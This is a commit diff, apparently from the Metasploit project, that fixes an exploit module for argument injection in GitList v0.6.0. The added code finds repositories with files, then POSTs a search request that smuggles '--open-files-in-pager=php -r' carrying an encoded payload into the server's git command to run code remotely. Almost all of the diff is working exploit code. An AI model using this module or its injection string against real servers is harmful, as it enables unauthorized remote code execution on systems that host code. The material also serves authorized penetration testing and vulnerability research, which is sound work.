Land #10278, gitlist_arg_injection fixes
commit
2f37482535
|
@ -35,13 +35,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'GitList v0.6.0', { } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '\'"' },
|
||||
'Payload' => { 'BadChars' => '\'' },
|
||||
'DisclosureDate' => "Apr 26 2018",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'Default path to GitList', '/'])
|
||||
])
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path, '/gitlist/')
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
|
@ -54,11 +60,42 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def get_repo
|
||||
repo_res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path)
|
||||
)
|
||||
|
||||
if repo_res && repo_res.code == 200
|
||||
repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten
|
||||
fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty?
|
||||
return repos.detect{ |r| r if has_files?(r) }
|
||||
else
|
||||
fail_with(Failure::Unreachable, "Could not access GitList")
|
||||
end
|
||||
end
|
||||
|
||||
def has_files?(repo)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, repo, '/')
|
||||
)
|
||||
if res && res.code == 200
|
||||
print_good("Successfully accessed repo #{repo}")
|
||||
return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty?
|
||||
|
||||
return true
|
||||
else
|
||||
fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
|
||||
cmd = '--open-files-in-pager=php -r "eval(\\"'
|
||||
cmd << payload.encoded
|
||||
cmd << '\\");"'
|
||||
repo = get_repo
|
||||
fail_with(Failure::Unreachable, "No files found in repos") if repo.nil?
|
||||
|
||||
postUri = normalize_uri(target_uri.path, repo << '/tree/c/search')
|
||||
cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
|
||||
send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => postUri,
|
||||
|
|
Loading…
Reference in New Issue